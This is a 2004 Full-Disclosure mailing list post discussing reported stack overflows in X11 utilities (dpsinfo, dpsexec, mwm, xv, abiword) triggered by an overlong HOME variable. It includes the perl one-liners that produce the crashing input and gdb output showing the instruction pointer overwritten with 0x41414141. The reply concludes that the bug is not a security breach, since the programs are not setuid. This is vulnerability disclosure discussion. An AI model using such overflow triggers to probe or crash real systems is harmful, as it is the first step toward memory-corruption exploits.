lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: andfarm at teknovis.com (Andrew Farmer)
Subject: some small bugs.

On 15 Aug 2004, at 05:49, Noam Rathaus wrote:
> On Sunday 15 August 2004 00:32, Gabriele Galadini wrote:
>>  Hi all,
>>
>>  i've found some packages on obsd current version
>>  (3.5) on arch x86, give me return problems.
>>
>>  I explain:
>>
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 4387'`
>>  mtv@...cuzio~$ dpsinfo
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 4387'`
>>  mtv@...cuzio~$ dpsinfo
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 5763'`
>>  mtv@...cuzio~$ dpsexec
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 1619'`
>>  mtv@...cuzio~$ mwm
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 2915'`
>>  mtv@...cuzio~$ xv
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 1013'`
>>  mtv@...cuzio~$ abiword
>>  Segmentation fault
>>
>>  shell used is bash version 2.05b
>>
>>  regards,
>>  G.
> Hi,
>
> Under Debian:
>
> #ll -l /usr/bin/X11/dpsinfo
> -rwxr-xr-x    1 root     root         6456 Jul  7 18:07 
> /usr/bin/X11/dpsinfo
>
> # gdb dpsinfo
> GNU gdb 6.1-debian
> Copyright 2004 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and 
> you are
> welcome to change it and/or distribute copies of it under certain 
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for 
> details.
> This GDB was configured as "i386-linux"...(no debugging symbols 
> found)...Using
> host libthread_db library "/lib/tls/libthread_db.so.1".
>
> (gdb) r
> Starting program: /usr/X11R6/bin/dpsinfo
> (no debugging symbols found)...(no debugging symbols found)...(no 
> debugging
> symbols found)...(no debugging symbols found)...(no debugging symbols
> found)...(no debugging symbols found)...(no debugging symbols 
> found)...(no
> debugging symbols found)...(no debugging symbols found)...(no debugging
> symbols found)...(no debugging symbols found)...(no debugging symbols
> found)...
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) bt
> #0  0x41414141 in ?? ()
>
> ----
>
> # ll /usr/bin/X11/dpsexec
> -rwxr-xr-x    1 root     root         8184 Jul  7 18:07 
> /usr/bin/X11/dpsexec
>
> # gdb dpsexec
> GNU gdb 6.1-debian
> Copyright 2004 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and 
> you are
> welcome to change it and/or distribute copies of it under certain 
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for 
> details.
> This GDB was configured as "i386-linux"...(no debugging symbols 
> found)...Using
> host libthread_db library "/lib/tls/libthread_db.so.1".
>
> (gdb) r
> Starting program: /usr/X11R6/bin/dpsexec
> (no debugging symbols found)...(no debugging symbols found)...(no 
> debugging
> symbols found)...(no debugging symbols found)...(no debugging symbols
> found)...(no debugging symbols found)...(no debugging symbols 
> found)...(no
> debugging symbols found)...(no debugging symbols found)...(no debugging
> symbols found)...(no debugging symbols found)...(no debugging symbols
> found)...
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
>
> ----
>
> So Debian is also vulnerable, both these binaries come with the 
> xbase-clients
> package.

However, the overflow does not lead to a security breach - none of the 
programs
in question are suid, so all you can do with an exploit is get a shell.

Which you already had, because you just launched the program from it :-)

In any case, the situation in which the bug shows up is so implausible
($HOME thousands of characters long) that it's barely worth fixing.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 186 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040815/f30f9815/PGP.bin

Powered by blists - more mailing lists